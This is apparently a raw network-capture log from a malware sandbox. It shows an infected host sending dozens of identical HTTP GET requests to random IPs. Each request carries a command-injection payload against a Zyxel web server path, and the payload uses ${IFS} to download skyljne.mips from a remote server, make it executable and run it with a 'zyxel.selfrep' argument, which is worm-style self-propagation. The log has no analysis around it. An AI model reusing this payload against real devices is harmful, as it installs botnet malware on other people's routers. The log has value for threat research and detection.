                                          Jan 14, 2024 15:46:11.886934042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3323192.168.2.2350954143.42.30.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886955976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3324192.168.2.2352742223.223.251.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.886984110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3325192.168.2.2350260191.114.97.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887017012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3326192.168.2.234650866.33.169.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887053967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3327192.168.2.2354190169.63.38.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887068987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3328192.168.2.235214875.154.40.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887096882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3329192.168.2.2339852223.0.198.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887137890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3330192.168.2.235387490.249.52.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887170076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3331192.168.2.2346840194.72.72.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887180090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3332192.168.2.2337766176.21.153.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887217999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3333192.168.2.2355690162.222.83.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887228966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3334192.168.2.2347296162.175.245.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887243986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3335192.168.2.233875075.81.5.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887259960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3336192.168.2.2352178204.125.213.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887295008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3337192.168.2.2338560219.44.75.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887320995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3338192.168.2.2356668166.169.151.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887340069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3339192.168.2.2345642115.88.164.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887347937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3340192.168.2.2347866211.38.187.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887389898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3341192.168.2.2360686141.238.236.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887403011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3342192.168.2.2349076157.85.96.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887423992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3343192.168.2.2352734211.250.232.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887461901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3344192.168.2.234831886.149.99.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887491941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3345192.168.2.23370044.20.73.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887536049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3346192.168.2.2332796191.88.134.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887553930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3347192.168.2.2333374178.64.192.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887571096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3348192.168.2.2341238159.207.11.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887589931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3349192.168.2.233987231.66.116.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887638092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3350192.168.2.235163812.165.181.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887656927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3351192.168.2.2350378220.103.180.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887681007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3352192.168.2.234750659.159.244.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887687922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3353192.168.2.234447643.127.67.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887692928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3354192.168.2.2351722212.149.163.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887715101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3355192.168.2.233860414.117.90.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887715101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3356192.168.2.2347912204.174.135.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887767076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3357192.168.2.2351658203.161.139.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887788057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3358192.168.2.235523292.188.220.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887804985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3359192.168.2.2336912100.224.145.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.887834072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3360192.168.2.2336600193.34.227.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890779018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3361192.168.2.235080036.253.132.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890795946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3362192.168.2.233898640.14.231.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890819073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3363192.168.2.2341066192.69.135.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890825987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3364192.168.2.233651413.192.71.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890871048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3365192.168.2.233952883.237.126.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890892982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3366192.168.2.234890841.198.131.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890899897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3367192.168.2.23485568.65.188.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890944958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3368192.168.2.233676497.181.213.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890944958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3369192.168.2.2336762116.103.87.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.890974998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3370192.168.2.2353510183.46.74.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891005993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3371192.168.2.2342774143.72.8.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891057968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3372192.168.2.235497449.182.181.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891096115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3373192.168.2.233619240.28.93.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891128063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3374192.168.2.234234865.150.73.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891169071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3375192.168.2.2334862183.16.121.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891206980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3376192.168.2.2359660121.209.38.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891227007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3377192.168.2.233560070.187.83.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891242981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3378192.168.2.234942878.71.132.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891269922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3379192.168.2.234723078.183.249.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891272068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3380192.168.2.235879668.66.74.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891302109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3381192.168.2.2344160126.112.102.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891302109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3382192.168.2.23476822.239.147.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891321898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3383192.168.2.2359586154.74.5.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891350031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3384192.168.2.233569682.18.109.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:11.891372919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3385192.168.2.2359526126.29.234.123443
                                          TimestampBytes transferredDirectionData
